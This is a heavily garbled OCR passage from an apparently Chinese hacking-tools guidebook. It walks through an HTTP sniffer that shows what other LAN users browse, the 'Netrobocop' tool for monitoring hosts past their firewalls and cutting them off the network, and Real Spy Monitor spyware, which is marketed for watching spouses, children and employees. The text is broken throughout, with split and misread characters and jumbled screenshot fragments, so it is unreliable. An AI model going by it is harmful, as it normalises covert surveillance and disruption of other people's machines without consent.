文本 文件 本 机 一 一 网 络 http:/Ad zqgame cormtcdqregicheckcode 上 时 ode aspx?0.03424670807090957 

文本 文件 本 机 一 一 网 络 hittp:/Ad zqgame cormactivitiesfcn6hndek htbni?ad=td142_4d%62C54%2C6b%2C78%2C48%2C44... 

文本 文件 本 机 一 一 网 络 http:Jhd zqgame .comytdqregicheckcode 由 ode aspx?0.7536875602677111 

文本 文件 本 机 一 一 网 络 httpi/video.sina .com.cnjapifiajax html 

图 片 文 件 本 机 一 一 网 络 Ny gf ?pid=1048s=28u=http:iN ku6 .comishowiHa-RXPPa9GPPSGI html&word=%c2%ed%c1%d5.. 

文本 文件 本 机 一 一 网 络 http:/izs3.cnzz comistst htm?id=107409d8r=8lg=zh-cn&ntime=0.74983100%2012774509818rep... 

图 片 文件 本 机 一 一 网 络 Ngif3pid=1048s=28u=htip:video sina 中 m cn/vibj34620116-1579974291 html&word=%c1%15... w 

状态 开始 噢 探 当前 工作 模式 [ 获 职 URL] 网 络 嗅 探 器 (影音 神探 ) 官 方 网 站 www.wbdq com 


在 J 时 栏 看 到 添加 的 备注 。 


在 “数据 包 ” 列 表 中 右 击 ， 在 弹出 的 快捷 菜单 中 选 
择 “ 分 类 查看 ”> “图 片 文件 ”命令 ， 即 可 显示 图 
片 形式 的 数据 包 。 

如 果 选 择 “ 分 类 查看 ”>“ 文 本 文件 ”菜单 命令 ， 则 
可 显示 文本 文件 形式 的 数据 包 。 


STEP19: 保存 文件 


rE 


目 软件 说 表 


Flle name: 


Fie gpe | 文本 文件 edxd) 


选择 保存 位 置 ， 然 后 单 击 “Save” 按 钮 。 


2 


< 第 2 章 


扫 摘 与 噢 探 工 具 
STEP20: 选择 保存 文件 方式 STEP21: 保存 完毕 


Information 


Information 


选择 区 人 忻 保 行 方式 : 


按 " 是 " 怀 行 所有 地 址 
本 证 只 你 仔 选 中 的 地 址 


单 击 “Yes” 按 钮 保存 全 部 的 地 址 。 文件 保存 完毕 。 


2.2.3 ”捕获 网 页 内 容 的 “ 艾 菲 网 页 侦探 ” 


艾 菲 网 页 侦探 是 一 个 HTTP 协议 的 网 络 嗅 探 如 、 协 议 捕 换 器 和 HTTP 文件 重建 工 
有 其。 它 可 以 捕 提 局域网 内 的 含有 HITP 协议 的 IP 数据 包 并 对 其 进行 分 析 ， 找 出 符合 过 
滤 堪 的 那些 HTTP 通信 和 内 容 ， 可 以 看 到 网 络 中 其 他 人 都 在 浏览 哪些 HTTP 协议 的 IP 数 
据 包 ， 并 对 其 进行 分 机 ， 找 出 符合 过 滤 需 的 那些 HITP 通信 内 容 ， 可 以 看 到 网 络 中 的 
其 他 人 都 在 浏览 哪 坚 网 页 ， 这 些 网 页 的 内 容 是 什么 。 该 工具 特别 适合 用 于 企业 主管 对 公 
司 员工 的 上 网 情况 进行 监控 。 

使 用 艾 菲 网 页 侦探 对 网 页 内 容 进 行 捕获 的 具体 操作 步 又 如 下 。 


STEP01: 运行 艾 菲 网 页 侦探 STEP02: 设置 相关 属性 


3; HttpDetect (EffeTech HTTP Sniffer) - Unregistered Version Sniffer Filter 


Specify buffer size to store captured packets [ > 5MB. 1 0 于 MB 
DMB )} 


< 
全 80is default HTTP port. Speclfy additional ports [separated [| 
by spacel. e.g.: 3080 8000 
erlIP:PORT) URL 


[¥ Show host name rather than IP if possible [Default] 


Content 
Some web pages or flles are not your sniffing target. 
Check what you need. 
fw Static web pages [2, .html, .htm, .xml) 
l¥ Images [ipg. .ipeg, .gj 
[¥ Any other files [cgi, php. jsp. css. zip, etc ] 


| Fb lter be Which host is your sniffing target? Any or a specific host. 


Seldct an adapter Any hosts no matter their location [Default] 
© Specify a host IP | DT 
Specify the role of the host, client or host? 
as a clent, only smiff HTTP communications requested by the hos 
他 Default] 
CAs a server only sniff HTTP communications responded by the ho 


Cancel | 


选择 “Sniffer”> “Filter” 菜 单 命 令 。 设置 可 缓冲 区 的 大 小 、 启 动 选项 、 探 测 文件 目标 、 
探测 的 计算 机 对 象 等 属性 。 
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合 人 他 他 


STEP03: 返回 主 界 面 


Fle View Sniffer 


a | 六 个 | 并 


Help 


目 | 必 全 | 借 


单 击 工具 栏 上 的 “开始 ”按钮 大 。 
STEP05: 打开 主 界 面 


起 》HttpDetect (EffeTech HTTP Sniffer) - Unregistered Vs 


File View |Sniffer | Help 


C= 


之 Ll 


如 Save the file 


Feb 
Feb 
Feb 
Feb 
Feb 
Feb 26... 
Feb 26..， 
Feb 26... 
Feb 26... 


s.baidu.com 


crsky.com 
crsky.com 
crsky.com 
www.crsky.com 
www.crsky.com 
www.crsky.com 


192.168.1.10 :7231 
192.168.1.10 :7232 
192.168.1.10 :7225 


192.168.1.10 :7234 v4.cnzz.com :80 


选中 需要 查看 的 捕获 
记录 ， 则 可 查看 其 HTTP 


选择 “Sniffer” 


>“View details” 菜 
Sa i 
DD xo 


STEP04: 捕获 浏览 网 页 的 信息 


HttpDetect (EffeTech HTTP Sniffer) - Unregistered Version 


File View Sniffer Help 
| 


| ml 六 人 | 六 | 目 | 多 ?3 机 


[No. | Time | ClientdP:PORT) _| Server(IP:PORT) File Leng 


。 192.168,1.10 :7220 
。 192,.168.1.10 :7224 
。 192.168.1.10 :7225 
。 192.168.1.10 :7225 
。 192.168.1.10 :7227 
。 192.168.1.10 :7228 
。 192.168.1.10 :7229 
。 192.168.1.10 :7230 
。 192.168.1.10 :7231 
。 192,168,1,10 ;7232 
。 192,168.1.10 :7225 
。 192.168.1.10 :7234 
。 192.168.1.10 :7235 
。 192.168.1.10 :7233 
。 192.168.1.10 :7230 
。 192,168.1.10 :7228 
。 192.168.,1.10 :7229 
。 192.168.1.10 :7236 

192 1fR 1 1n :7727 


mm 和 hmwN 呈 攻 = 


xbox.360game.360,.. 
s.360.cn :80 
www.crsky.com :80 
www.crsky.com :80 
cbjs.baidu.com :80 
www.crsky.com :80 
www.crsky.com :80 
www.crsky.com :80 
www.crsky.com :80 
www.crsky.com ;80 
www.crsky.com :80 
V4.cnzz.com :80 
v8.cnzz.com :80 
dx.crsky.com :80 
www.crsky.com :80 
www.crsky.com :80 
www.crsky.com :80 
pstatic.xunlei.com :… 
caunt crebv cram :RN 


/api/getversion?uuid=1393381076.., 
/sou/click_og.gif?q=%E8%89%BE... 
/soft/2305.html 
/theme/crsky_2009.css 

js/m:js 

/theme/jquery-1.3.2.min,s 
/theme/iQselect,js 
/theme/jquery.cookie,s 
/js/iquery.autocomplete.js 
/theme/global,js 

/theme/js_soft.js 
/stat.php?id=91594&web_ id=91594 
/stat.php?id=3006368&web_id=30... 
/js/softjs?t= 

/theme/script.js 

/is/comment,s 

fis/count/2305,s 
/fis/webThunderDetect,s 

ftanle /Dewwn unt achy?7id=72N5 


查看 捕获 到 的 信息 。 


STEP06: 


HTTP Communications Detall 


Buffer 10% URLs: 172 |packets: 96: 才 


HTTP 通信 详细 资料 


Detail |Content | Text View | Packets | Commands | 


General Informatior 
Ho. 2 


Client -> Server: 


TimeStamp: 


Feb 26， 


Whether finished: Tes 


192. 168. 1. 10:7225 -> 111. 206. 34. 186:80 


Packets List 


Req |BufI.. |Tine |TCP segqnun | TCP aclkmoam |Com... |Datalen | 


2451707139 
216372070 
216372412 
216373852 
216375292 
216377937 
216376497 
216379397 
216377957 
216380857 
216379417 
216382317 
216380877 
2163837T77 
216382337 
216363797 
216385237 
216386697 
216385257 
216388157 
216386717 
216389617 
216388177 


216372070 490 
2451707629 342 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 
2451707629 


OOOOOOOOOOOOOOOOOOOO0n 


查看 所 选 记 录 条 的 详细 信息 。 


和 


2 


STEP07: 查看 HTTP 请 求 头 


Feb 26... 
Feb 26..， 
Feb 26... 
Feb 26... 


192.168.1.10 :8055 
192.168.1.10 :8055 
192.168.1.10 :8058 
192.168.1.10 :8057 


123.129.242.179 :80 
123.129.242.179 :80 
538.254.134.218 :80 
38.254.134.137 :80 


STEPO8: 


Flle View Sniffer 


扫 拉 与 咀 探 工具 


保存 文件 


1 HttpDetect (EffeTech HTTP Sniffer) - Unregistered Versic 


Help 


名 | 六 | 目 | 心 量 | 介 


而 No. | Time “| Client(P:PORT) Server(IP:PORT) 


0 
1 
2 
3 
是 
6 
网 
8 


. | 192.168.1.10 :7220 
.| 192.168.1.10 :7224 
-| 192.168&1.10 :7223 
. | 192.168.1.10 :7225 
. | 192.168.1.10 :7227 
. | 192.168.1.10 :7228 
| 192.168.1.10 :7229 
. | 192.168.1.10 :7230 
.| 192.168.1.10 :7231 


xbox.360game.360. 
s.360.cn :80 

www.crsky.com :80 
www.crsky.com :80 
cbjs.baidu.com :80 
www.crsky.com :80 
www.crsky.com :80 
www.crsky.com :80 
www.crsky.com :80 


选中 需要 保存 的 记录 ， 单 击 “ 保 存 来 自选 定 链接 的 
文件 ”按钮 您 ， 可 将 所 选 记录 保存 到 磁盘 中 ， 可 通 
过 “记事 本 ”程序 打开 该 文件 。 

在 使 用 羡 菲 网 页 侦探 博 绪 下 载 地 址 时 ， 不 仅 可 以 捕获 到 其 引用 页 地 址 ， 而 且 可 以 捕获 
到 其 真实 的 下 载 地 址 。 


用 工具 实现 网 络 监控 


将 该 地 址 直接 添加 到 FlashGet 等 下 载 工具 的 网 址 
栏 中 ， 即 可 下 载 相 应 程序 。 


2.3 


2.3:1 运用 “网 络 执法 官 ” 实 现 网 络 监 挥 


“网 络 执法 官 ” 是 一 球 局 域 网 管理 辅助 软件 ， 采用 网 络 底 层 协 议 ， 能 罕 透 各 客户 端 防火 
普 对 网 络 中 的 每 一 台 主 机 (这 里 的 主机 是 指 各 种 计算 机 、 交 换 机 等 配 有 IP 的 网 络 设 备 ) 进 
行 监控 ; 采用 网 卡号 MAC 地址 ) 识别 用 户 等 。 

1. 安装 网 络 执法 官 

“网 络 执法 官 ” 的 主要 功能 是 依据 管理 员 为 各 主机 限定 的 权限 ， 实 时 监控 整个 局 域 网 ， 并 自 
动 对 非法 用 户 进行 管理 , 可 将 非法 用 户 与 网 络 中 某 些 主机 或 整个 网 络 隔离 , 而 日 无 论 局 域 网 中 的 
主机 运行 何 种 防火 墙 ， 都 不 能 逃避 监控 ， 也 不 会 引发 防火 墙 警告 ， 提 高 了 网 络 安全 性 。 

在 使 用 “网 络 执法 官 ” 进 行 网 络 监 控 前 应 对 其 进行 安装 ， 有 具体 的 操作 步骤 如 下 。 
STEP01: 下载 并 解压 文件 STEP02: ”安装 向 导 


六 | 安装 - Netrobocop v3.48 


欢迎 使 用 Netrobocop v3. 48 安装 同 导 
现在 将 安装 Hatrobocop 到 您 的 电脑 中 。 

推荐 您 在 继续 安装 前 关闭 所 有 其 它 应 用 程序 。 

单 击 “ 下 一 步 ” 继 续 ， 或 单 击 “ 取 消 ”退出 安装 程序 。 


得 选择 安装 时 要 使 用 的 井 言 : 


双击 “网 络 执法 官 ” 安 单 击 “ 下 一 步 ”按钮 。 
装 程序 图 标 ， 打 开 “ 选 择 


安装 语言 ”对 话 框 。 


5 时 


选择 需要 使 用 的 
语言 ， 单 击 “ 确 定 ” 
按钮 。 


合 人 他 他 


re 


工具 全 攻略 


STEP03: 选择 目标 位 置 


| 安装 - Netrobocop v3.48 


选择 目标 位 置 
您 想 将 Hetroboecop 友 . 8 安装 在 什么 地 方 ? 


| ”安装 程序 将 安装 Hetrobocop v3. 48 到 下 列 文 件 来 中 。 


单 击 “ 下 一 步 ” 继续 。 如 果 您 想 选 择 其 它 文 件 夹 ， 单 击 “浏览 ”。 
EEC | ER- 


至 少 需要 有 7.3 吓 的 可 用 磁盘 空间 。 


ES | 3 


单 击 “下 一 步 
按钮 。 


国 单 击 “ 浏 览 ”按钮 ， 
选择 安装 目标 位 置 。 
STEP05: 选择 附加 任务 
码 | 安装 - Netrobocop v3.48 


选择 附加 任务 
您 想 要 安装 程序 执行 哪些 附加 任务 ? 


次 江 人 外相 天 安装 程序 在 安装 Hetrobocop vw3. 48 时 执行 的 附加 任务 然后 单 击 


附加 快捷 方式 : 
加 创建 桌面 快捷 方式 各) 
加 | 创建 快速 运行 栏 快 捷 方式 @) 


国 根据 需要 勺 选 需 加 单 击 “下 一 步 " 
创建 快捷 方式 的 位 置 。 按钮 。 


STEP07: 安装 向 导 完 成 


疝 | 安装 - Netrobocop v3.48 
Netrobocop v3. 48 安装 同 导 完成 
”7 


单 击 “ 完 成 ”退出 安装 程序 。 


: 运行 Hetrobocop 


勾 选 “运行 Netrobocop” 单 击 “ 完 成 ” 
复 选 框 。 按钮 。 


STEP04: 选择 开始 菜单 文件 夹 


六 安装 - Netrobocop v3.48 


选择 开始 菜单 文件 去 
您 想 在 哪里 放置 程序 的 快捷 方式 


| ”安装 程序 现在 将 在 下 列 开 始 菜单 妇 件 夹 中 创建 程序 的 快捷 方式 。 


单 击 “ 下 一 步 ”继续 。 如 果 您 想 选 择 其 它 文件 夹 ， 单 击 “ 浏 览 ”。 


EF 


国 单 击 “ 浏 览 ”按钮 ， 选 单 击 “一 地” 
择 开始 菜单 文件 夹 位 置 。 7 
STEP06: 准备 安装 


而 安装 - Netrobocop v3.48 


准备 安装 
安装 程序 现在 准备 开始 安装 Hetrobocop v3.48 到 您 的 电脑 中 。 


9 “安装 ”继续 此 实 装 程序 。 如 果 您 想 雪 回 顾 或 改变 设置 ， 请 单 击 “上 一 


目标 位 和 ‘Netrobocop 


开始 菏 单 文 件 来 : 


Hetrobocop 


附加 任 
nn 


EE 7 | E27 


加 确认 安装 信息 。 单 击 “ 安 装 ”按钮 。 


STEP08: 设置 监控 范围 


: [Atheros ARB151 PFCI-E Cigablt Ethernet Controller -| 


述 : Atheros AR8151 PCI-E Gigabit Ethernet Controller 


: [IP:192. 168.1.10/24 [192.168.1.1 - 192.168.1.254] | 
扫 措 范围 : [192. 168.1.1 - |192. 168. 1.254 添加 /修改 
监控 如 下 子 网 及 IP 段 : 


风 摘 巷 前 范围 [计数 ] 


192. 68. 1. 10 255. 255. 255.0 192.168.1.1 - i192. 168.1. 


手工 操作 ， 取 消 自动 运行 。 


不 扫 指 | 确定 | 退出 | 


国 指定 监测 的 硬件 对 象 和 网 段 范 ” 辆 单 击 “ 确 
围 , 单 击 “ 添 加 /修改 ”按钮 。 定 ” 按钮 。 
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STEP09: 打开 “网 络 执法 官 ” 操 作 窗 口 


a 用 户 [U]】 数 磊 [D]】 大 动 [H] 
| 本 国 本 网 用 户 | 加 用具 到 | 多 | 


， 过 21-OA rr 了 6 己 192. 168.1.1 pe 一 2013-12-13 17:15.31 
90-28-34-09-76-F7 192. 168.1. 15 OC— 2013-12-13 17:15:31 界面 中 显示 在 同 个 局 或 网 下 的 所 有 用 户 ， -发 
| | 不 — 0 [至 

| 90-28-34-09-76-F4 加 192. 188. 1.55 他 一 2013-12-13 17:15:31 J 省、\ 了 a S i a, = 
| C8-60-00-78-53-AE 192. 168. 1.88 DO WORKGROUP / ZEG / ZEG 2013-12-13 17:15:31 


| 168. 络 邻 居 “ 主 控 器 ] % -12- : \ 六 是 
[eratooreas :本 和 看 其 状态 、 流 量 、IP 地 址 、 是 否 锁定 、 最 后 上 线 时 


间 、 下 线 时 间 、 网 卡 注释 等 信息 。 


“网 卡 MAC 地 址 ”是 网 卡 的 物理 地 址 ， 也 称 便 件 地 址 或 链 路 地 址 ， ee 
标识 ， 一 般 不 能 随意 改变 。 无 论 把 这 个 网 卡 接 入 网 络 的 什么 地 方 ，MAC 地 址 都 不 变 。 其 长 
度 为 48 位 二 进 制 数 ， 由 12 个 00~0OFFH 的 十 六 进 制 数组 成 ， 每 个 十 六 进 制 数 之 间 用 “-” 
隔 开 ， 如 “00-0C-76-9F-BC-02”。 

2. 查看 目标 计算 机 属性 

使 用 “网 络 执法 官 ” 可 收集 处 于 同一 局 域 网 内 所 有 主机 的 相关 网 络 信息 。 有 具体 的 操作 
步骤 如 下 。 


STEP01: 打开 “网 络 执法 官 ” 操 作 窗 口 STEP02: 查看 用 户 属 性 


长 角 牛 网 络 些 : 
Lai 


EC 21-0A- es 6 .168.1. 2013-12-13 17:15:31 用 户 注释 |G6IGA-BYTE TECHNOLDGY CO0. ,LID. 保存 


90-2B-34-09-76-FT 192, 168. 1. 15 2013-12-13 17:15;31 


34-09-76-F4 192. 168. 1.55 2013-12-13 17:15:31 IF 地 址 [ 192. 168. 1. 102 


I C8-60-00-78-59-AE 192. 168. 1.88 WORKGROUP / ZKG / ZKG 2013-12-13 17:15:31 


| 仿 30-23-34-09-70-49 192.168.1.100 他 【“ 网 络 邻 居 “ 主 控 器 ] 小 2013-12-13 17:15:31 组 /主机 /用 户 [roRKGROUP ” 4L8QD1IETPGEVS1IW / 4L3QD1ETPGEYS1YW 


| 90-2B-34-09-7C-28 192. 168. 1. 102 地 WOREKCHEOUE /4L89D1E. . . 2013-12-13 17:15:32 
首次 上 线 2013-12-13 17:15:32 - 2013-12-13 18:03:22 


末次 上 线 [2013-12-16 11:17:20 - 当前 在 线 


EE i 位 设置 权限 | CO) 昨 除 用 户 


双击 “用 户 列表 ”中 需要 查看 的 对 象 。 查看 用 户 的 网 卡 地 址 、 园 单 击 “历史 
IP 地 址 、 上 线 情况 等 。 记录 ”按钮 。 


STEP03: 查看 在 线 记 录 


用 户 : [30-2B-34-09-7C-28 [生产 厂家 :GIGA-BYTE TECHNOLDGY C0. ,LTD.] 
注释 : |GIGA-BYTE TECHNOLOGY 5C0. ,LID. 


; 192. 168. 1. 102 WORKGROUP / 4L8QD1ETPGKYS1Y ... 2013-12-16 11:17:20 查看 该 计算 机 上 线 的 情况 6 


192. 168. 1. 102 WORKGROUP /{ 4L8QDIETPGEYSIY ... 2013-12-13 17:15:32 


由 


蒜 拉 用 开放 


ST IF 一 一 


会 全 对 性 
3. 批量 保存 目标 主机 信息 
除 收 集 局 域 网 内 各 个 计算 机 的 信息 之 外 ,“ 网 络 执 法 官 ”还 可 以 对 局 域 网 中 的 主机 信息 
进行 批量 保存 。 上 其 体 的 操作 步 又 如 下 。 


STEP01: 打开 “网 络 执 法 官 ” 操 作 窗 


工具 全 攻略 


系统 [T] ”设置 [S] 用 户 [U] 人 帮助 [H] 


查找 对 象 用 1 
用 户 : | -- 所 有 用 户 -- | 90-2D-34-09-7C_26 .1. 102 or 7 4LBQD1E. . 2013- 12-13 17:15:: 
权限 : | a 所 有 用 E es =] 90-2B-34-09-70-49 .168. 1. 100 WORKGROUP / SZY-PC ... 2013-12-13 17:15:: 


C8-B0-00-78-58-AE .168. 1.88 WORKGROUP / ZEG / ZKG 2013-12-13 17:15:: 
通 醒 竺 : %%? 90-2B-34-09-7B-F4 .168. 1. 55 2013-12-13 17:15:: 
日 / 主 机 用户 名 包含 : 90-25-34-09-T6-FT .168. 1. 15 2013-12-13 17:15:: 
8C-21-0A-89-AE-B6 .168.1.1 2013-12-13 17:15:: 


IFs: [192. 168.0.1 
和 [192. 168.1;,255 


在 线 时间 : |2013-11-16 11:17 一 
= [2013-12-16 1 17 .Em 


持续 在 线 : 后 ”小 时 以 上 
下 线 原因 和 


于 | | 时 二 二 二 
十 3 和 奈 ; 上 时 D0 
此 和 


用 总 数 7 ES630 | Tcp:88 Udp:74 ”| 运行 00:02'49* 试用 版 本 , 将 在 27 分 钟 后 千 s 
es EE | 


单 击 “ 记 录 查 输入 起 始 IP 地 址 和 结 开始 收集 局 域 网 单 击 “ 导 出 ” 
询 ” 选 项 卡 。 IP 地址 ， 单 击 “ 查 找 ” 按 钮 。 ”中 计算 机 的 信息 。 按钮 。 


STEP02: 查看 导出 信息 


序号 , mac, 所 用 IP, 名 称 , 上 线 时 间 , 下 线 时 间 , 下 线 原 因 , 用 户 注释 

1, 90-2B-34-09-7C-28, 192. 168. 1. 102, WORKGROUP / 4L8QDIETPGKV51W / 
|4L8qp1ETPGKVS5IW 2013-12-13 17:15, 2013-12-13 18:03, 未 知 , GIGA-BYTE 
TECHNOLOGY C0. , LTD. 

2, 90-2B-34-09-70-49, 192. 168. 1. 100, WORKGROUP / SZY-PC / SZY-PC, 2013 
-12-13 17: 15, 2013-12-13 17:44, 未 知 , GIGA-BYTE TECHNOLOGY C0. ,LTD. 

3, C8-60-00-78-58-AF, 192. 168. 1. 88, WORKGROUP / ZKG / ZKG, 2013-12-13 


17: 15, 2013-12-13 17:44, 未 知 ， ASUSTok COMPOTER INC. 


A 所 有 信息 导出 为 文本 文件 , 可 在 记事 本 中 查看 导出 


5, 90-2B-34-09-76-F7, 192. 168.1.15,-/-/- ,2013- 12-13 17:15, 2013 一 


12-13 17:41, 未 知 , GIGA-BYTE TECHNOLOGY C0. ， 信 自 
6, 3C-21-0A-89-AE-B6,. 192. 168.1.1,-/-/- ,2013- 12-13 17:15, 2013-12 号 /CE\oO 
-13 18: 03, 未 知 , TP- LINK TECHNOLOGIES ks 


4. 设置 关键 主机 
“关键 主机 ”是 由 管理 员 指 定 的 IP 地 址 ， 可 以 是 网 关 、 其 他 计算 机 或 服务 器 等 。 管 理 


ss 
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员 将 指定 的 卫 地 址 存 入 “关键 主机 ”之 后 ， 即 可 令 非 法 用 户 仅 断 开 与 “关键 主机 ”的 连接 ， 


而 不 断 开 与 其 他 计算 机 的 连接 。 
设置 关键 主机 组 的 具体 操作 方法 如 下 。 


STEP01: 打开 “网 络 执法 官 ”操作 窗口 STEP02: 关键 主机 组 设置 


本 长 角 牛 而 络 尾 控 机 

你 ) : 站 2 
用 户 [U] 数 手 [D] ”帮助 [H] 
加 本 R 有 户 | 加 1 当 列 | 区 记录 | 


也 IB 
局 192. 188.1.1 2013-12-13 17:15:31 
后 192. 168. 1. 15 二 2013-12-13 17:15:31 


192. 168. 1. 55 一 2013-12-13 17:15:31 
名 192. 168. 1. 88 WORKGROUP / ZEG / ZEG ~ 2013-12-13 17:15:31 


192. 168. 1. 100 全 【'` 网 络 邻 居 “ 主 控 器 ] % 2013-12-13 17:15:31 站 2 .0.0.0 3. [0.0.0.0 


B12.168.1102 | WRKGRDYP / 4L89D1F... 2013-12-13 17:15:32 
0.0.0.0 6. |0.0.0.0 


0.0.0.0 gal0. 0.0.0 
0.0.0.0 ley0. 0: 0.0 
0.0.0.0 15. |0.0.0.0 


su). 0 0. 0 18. a. 0.0.0 


选择 “设置 ” >“ 关键 主机 组 ”菜单 命令 。 团 在 “选择 关键 主 国 设 置 国 单 击 “全 部 保存 " 
机 组 ”下 拉 列表 框 ”组 内 IP。 按钮 ， 使 关键 主机 
中 选择 关键 主机 组 的 修改 即时 生效 并 
的 名 称 。 进行 保存 。 


5. 设置 默认 权限 
“网 络 执法 官 ” 还 可 以 对 局 域 网 中 的 计算 机 进行 网 络 管理 。 它 并 不 要 求 安 厂 在 服务 
融 中 ， 而 是 可 以 安 痛 在 局 域 网 内 的 任 一 台 计 算 机 上 ， 即 可 对 整个 局 域 网 内 的 计算 机 进行 


管理 。 
设置 用 户 权 限 的 具体 操作 如 下 。 
STEP01: 打开 “网 络 执法 官 ” 操 作 窗 STEP02: 用 户 权 限 设 置 


司 长 角 牛 网 绝 监 拉 机 | | 


| zm ms) 用 户 [U | 数 磊 [D]】 者 动 [H] ” : mac 8C-21-0A-89-AE-B6  [ TP-LINK TECHNOLOGIES CO., LTD. ] 
| 加 二 - 国 本 网 阴户 | 加 最 和 省 双 | 熙 | 该 用 户 权限 为 系统 趴 予 的 默认 权限 ， 时 间 2013-12-13 17:15:00 。 
一 rr i ee = 2013-12 $3 [ee 
1-0Ok 1 | es 1312-13 17:15:31 
90-~2B-34-09-T6-~ 了 7 192. 168. 1. 15 四 ~ 2013-~12-13 17:15:31 U -一 -一 卫生 起 
90-2B-34-09-76-F4 192. 168. 1. 55 四 et 2013-12-13 17:15:31 
C38-60-00-78-53-AE 192. 168. 1. 88 地 WORKGROUP / ZEG / ZKG 2013-12-13 17:15:31 


90-2B-34-09-70-49 器 192. 168. 1. 100 地 【' 网 络 邻 居 ' 主 控 器 ] 1... 2013-12-13 17:15:31 
90-2B-34-09-7C-28 BD) 192. 168. 1. 102 (DH WOREGROUP / 4L8QD1FE... 2013-12-13 17:15:32 


启用 时 间 限 制 
开放 时 间 0.0 小 时 ， 屏 蔽 时 间 24.0 
启用 组 /主机 /用 户 名 限制 
未 设置 
厂 超过 及 ”| 天 未 上 线 风 设 为 禁止 用 户 
| 个 禁止 用 户 ， 发 现 该 用 户 上 线 即 管理 。 
对 违反 以 上 权限 的 用 户 ， 将 自动 按 以 下 方式 进行 管理 。 


到 二 主机 | 
取消 | 
选择 “用 户 ”>“ 权 限 设置 " 菜单 命令 并 选择 一 个 网 ” 圈 启用 “ 受 限 用 户 ， 国 根据 需要 勾 选 “启用 IP 
卡 权限 。 若 违反 以 下 权限 将 。 限制 " 复 选 框 ， 并 单 击 “禁用 
被 管理 ” 单 选 按钮 。 以 下 IP 段 ， 未 设 定 ” 按 钮 。 
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工具 全 攻略 


合 人 他 他 


STEP03: “IP 限制 ”设置 STEP04: 返回 “用 尸 权 限 设置 ”对 话 框 


[Imac BC-21-0OA-89-AE-B8  [ TP-LINK TECHNOLOGIES CO., LTD. ] 
该 用 户 权限 为 系统 跌 予 的 默认 权限 ， 时间 2013-12-13 17:15:00 。 


广 设置 权限 


个 自由 用 户 ， 与 网 络 连 接 不 受 限 制 。 
人 爱 限 用 户 ， 若 违 民 以 下 权限 将 被 管理 。 


三 启用 IP 限 制 


三 启用 时 间 限 制 


三 启用 时 段 限 制 


开 误 时 间 0.0 小 时 ， 愤 蔽 时 间 24.0 ] 
厂 启用 组 /主机 /用 户 儿 限制 


厂 超过 司 ”| 天 未 上 线 则 设 为 禁止 用 户 


- 管理 方式 - 


未 设置 | 


克 IP 冲突 


[Y 断 开 与 指定 关键 机 组 的 连接 : 未 设置 


[Y 断 开 与 所 有 主机 TCP/IP 连 接 懈 本 机 及 敏感 主机 外 ) 


关键 主机 组 


二 HM FEIF) 


对 IP 进行 设置 。 国 单 击 “ 确 定 " 按钮 。 国 也 可 启用 “禁止 用 
户 ， 发 现 该 用 户 上 线 
即 管理 ” 单 选 按钮。 


6. 禁止 目标 计算 机 访问 网 络 


在 “管理 方式 ”选项 
组 中 根据 需要 勾 选 相应 复 
选 框 ， 然 后 单 击 “保存 " 
按钮 。 


禁止 目标 计算 机 访问 网 络 是 “网 络 执法 官 ” 的 重要 功能 ， 上 有 具体 的 禁止 方法 如 下 。 
STEP01: 打开 “网 络 执法 官 ” 操 作 窗 口 STEP02: 锁定 方式 设置 


系 妩 IT] 设 吾 (5】 用 挛 LU RD 扰 约 IH] 


BC-21-0A-89-AE-BB [TF-LINK TECHNOLOGIES 5C0.，LID. ] 


eC-21-0A-69-AE-B6 1 192. 16 日 2013-12-16 1 20 
00-28-34-00-T6é-FT 192.16E 2013-12-16 11:17:20 :了 . | ee HIO 
30-20-34"09"T6-F4 192, 166 2013"12-16 }1:;17:;20 = 注释 : TP LINEK TEC LDGIES C0. . LID. 


[6-60-00-75-56- 好 192.16E 201312-16 11:%:089 
80-28-34-09-T0-49 192.15E 上 有 2013-12-16 11:17:20 
30-29-34"09-7C-290 192, 166 | 2013-12-16 11;17:;20 


0-26-34-09-T6-BA g2.16 = 2013-12-16 11:17:20 E - 二 
10-89-37-8c-08-se 加 te i :4 请 不 要 对 诸如 路 由 器 、 交 换 机 、 上 


C 不 锁定 (解锁 ) 
C 禁止 与 以 下 关键 主机 组 的 TCPATP 连 接 


广 第 ] 组 。” 三 第 2 组 
三 第 5 组 。” 三 第 6 组 


二 上 二 ER 
右 击 “用 户 列表 ” 中 的 任意 一 个 对 象 ， 在 弹出 的 快 ” 国 启用 "禁止 与 所 有 
捷 菜 单 中 选择 “锁定 /解锁 ”命令 。 主机 的 TCP/IP 连接 


( 除 敏感 主机 外 )” 单 
选 按钮 。 


2.3.2 ”运用 Real $py Monitor 监控 网 络 


此 - . 
姥 吕 等 网 络 关键 设备 进行 锁定 。 


三 第 3 组 ” 厂 第 组 ”|.、 | 
: 设置 
矿 第 7 组 矿 第 3 组 计 


单 击 “ 确 定 ” 按 
钮 ， 即 可 实现 禁止 目 
标 计算 机 访问 网 络 这 
项 功能 。 


Real Spy Monitor 是 一 多 监测 互联 网 和 个 人 计算 机 以 保 隐 其 安全 的 软件 ， 键 盘 可 击 、 网 


网 60 


< 


扫 朱 与 咀 探 工具 


页 站 点 、 视 寄 开 关 、 程 序 执行 、 屏 幕 扫 摘 以 及 文件 的 出 入 等 都 是 其 监控 的 对 象 。 
1. 添加 使 用 密码 
在 使 用 Real Spy Monitor 对 系统 进行 监控 之 前 ， 要 进行 一 些 设 置 ， 上 具体 的 操作 步骤 如 下 。 


STEP01: 启动 Real Spy Monitor STEP02: 输入 密码 


候 有 wp Gy Mnatar 


Real Spy Monitor is a Powerful spy-monitoring-security tool. 


Dld Pass\ ord: 


[| | 


New Passy ord: 


Worried about how your PC is being used? Want to keep tabs on 
Your children,spouse,employees? Need to Prevent your children 
or employee from some application or websites? Real Spy Monitor 
is the full solution for you. 


[| 


Conmfirm: 


This window will be displayed upon every run of Real Spy Monitor. 
All monitoring intervals during this trial period will terminate after 20 
minutes. This window is eliminated by purchaseing the full version. 


Click on the Ordering Information button to know how to purchase 


this product. 
一 = 


打开 “注册 ”页 面 ， 阅 读 注册 信息 后 , 单 击 “Co- ”图 第 一 次 使 有 时， 只 需 在 "New ” 国 单 击 'oK' 


ntinue” 按 钮 。 PassWord” 和 “Confirm” 文 本 框 ” 按钮 。 
中 输入 相同 的 密码 。 


在 SetPassWord 对 话 框 中 所 填写 的 新 密码 将 会 在 Real Spy Monitor 中 处 处 使 


用 ， 所 以 千 万 不 能 筷 记 该 密码 。 


